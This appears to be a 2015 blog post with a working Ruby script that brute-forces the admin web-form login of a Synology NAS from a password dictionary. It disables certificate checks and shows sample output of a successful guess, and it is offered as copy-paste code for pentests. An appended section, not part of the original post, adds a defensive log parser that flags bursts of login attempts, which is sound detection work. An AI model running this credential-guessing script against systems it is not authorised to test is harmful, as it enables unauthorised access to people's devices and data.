Thursday, January 29, 2015

Writing a web form bruteforcer in Ruby

Testing for weak credentials on web applications or devices that use web-form authentication is a very common thing to do during pentests. A lot of the time you'll come across a device whose only management interface is the web UI, and that interface usually requires authentication via submitted form fields.

I decided I wanted to write my own bruteforcer for a Synology NAS I happen to have on hand. People commonly suggest using Nokogiri to fetch and parse web pages. That's all fine and dandy for simpler, more straightforward web code, but when you start getting into web 2.0 stuff, or if you just don't want to deal with it, I've found that Mechanize helps tremendously.

Below is the final code I came up with. It's fairly simple. It reads a file called "passlist.txt", which is the password dictionary, and for every password in that file it attempts a login to the login page. It then inspects the returned response body to decide whether the attempt succeeded or failed. (This is mainly meant as a PoC, not as a tool.)

require 'rubygems'
require 'mechanize'
#this script will brute force the web form login for a synology nas

passwordlist = File.open("passlist.txt")
agent = Mechanize.new{|a| 
    a.verify_mode = OpenSSL::SSL::VERIFY_NONE
    #a.set_proxy('localhost',8080)
    }
target = 'https://NASIPHere:5001/webman/index.cgi'
user = 'admin'

passwordlist.each do |password|
    page  = agent.get target

    # Fill out the login form
    form          = page.form_with :id => 'login-form'
    form.username = user
    form.passwd   = password.chomp #this is important otherwise the newline will break the auth and everything fails
    result = form.submit

    case
    when result.body =~ /"success" : false/ then puts "Failure with #{password}"
    when result.body =~ /"success" : true/ then puts "SUCCESSFUL LOGIN WITH #{password}"
    else puts "Unknown response body when using \"#{password}\": #{result.body}"
    end
end

Running the script yields the following output:

ruby synology-web-form-brute.rb
Failure with admin
SUCCESSFUL LOGIN WITH yoloswag
Failure with kittens

Again, this is not meant to be fancy, groundbreaking, or anything other than some code to copy and paste if you need it.

(There are a variety of tools that will do the same thing or a very similar attack much faster than this, such as hydra/medusa/burp/etc.)
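As an added example that is not part of the original post, here is the defender's side of the same loop: a small Ruby script that reads web-server access-log lines and flags any client that bursts POSTs to the NAS login endpoint (`/webman/index.cgi`, as used above) within a short window. The log lines, the Mechanize user-agent string, the window and the threshold are all constructed assumptions for illustration, not real Synology output.

```ruby
require 'time'

# Constructed sample lines in Apache/nginx "combined" access-log format.
# One client hammers the login endpoint in a few seconds; another sends two
# spread-out POSTs that look like a normal user mistyping a password.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [29/Jan/2015:10:00:01 +0000] "GET /webman/index.cgi HTTP/1.1" 200 512 "-" "Mechanize/2.7"
  203.0.113.7 - - [29/Jan/2015:10:00:01 +0000] "POST /webman/index.cgi HTTP/1.1" 200 24 "-" "Mechanize/2.7"
  203.0.113.7 - - [29/Jan/2015:10:00:02 +0000] "POST /webman/index.cgi HTTP/1.1" 200 24 "-" "Mechanize/2.7"
  203.0.113.7 - - [29/Jan/2015:10:00:02 +0000] "POST /webman/index.cgi HTTP/1.1" 200 24 "-" "Mechanize/2.7"
  203.0.113.7 - - [29/Jan/2015:10:00:03 +0000] "POST /webman/index.cgi HTTP/1.1" 200 24 "-" "Mechanize/2.7"
  203.0.113.7 - - [29/Jan/2015:10:00:03 +0000] "POST /webman/index.cgi HTTP/1.1" 200 24 "-" "Mechanize/2.7"
  198.51.100.4 - - [29/Jan/2015:10:00:05 +0000] "POST /webman/index.cgi HTTP/1.1" 200 24 "-" "Mozilla/5.0"
  198.51.100.4 - - [29/Jan/2015:10:03:05 +0000] "POST /webman/index.cgi HTTP/1.1" 200 24 "-" "Mozilla/5.0"
LOG

LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>\S+) (?<path>\S+) [^"]*" (?<status>\d{3})/

# Parse one combined-format line into a Hash, or return nil if it does not match.
def parse_line(line)
  m = LINE_RE.match(line) or return nil
  { ip: m[:ip], time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: m[:path], status: m[:status].to_i }
end

# Return { ip => largest number of POSTs to login_path inside any `window`
# seconds } for clients whose burst reaches `threshold`. A sliding window over
# sorted timestamps, so slow, spread-out attempts (198.51.100.4) are not flagged.
def login_bursts(log, login_path: '/webman/index.cgi', window: 60, threshold: 5)
  posts = Hash.new { |h, k| h[k] = [] }
  log.each_line do |line|
    e = parse_line(line) or next
    posts[e[:ip]] << e[:time] if e[:method] == 'POST' && e[:path] == login_path
  end
  posts.each_with_object({}) do |(ip, times), flagged|
    times.sort!
    best = 0
    start = 0
    times.each_with_index do |t, i|
      start += 1 while t - times[start] > window   # drop timestamps outside the window
      best = [best, i - start + 1].max
    end
    flagged[ip] = best if best >= threshold
  end
end

puts login_bursts(SAMPLE_LOG).map { |ip, n| "#{ip}: #{n} login POSTs within 60s" }
```

On the sample data only 203.0.113.7 is reported (5 POSTs in a few seconds); pointing the same check at real logs from the reverse proxy in front of the NAS is the cheap way to notice a dictionary run like the one above.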
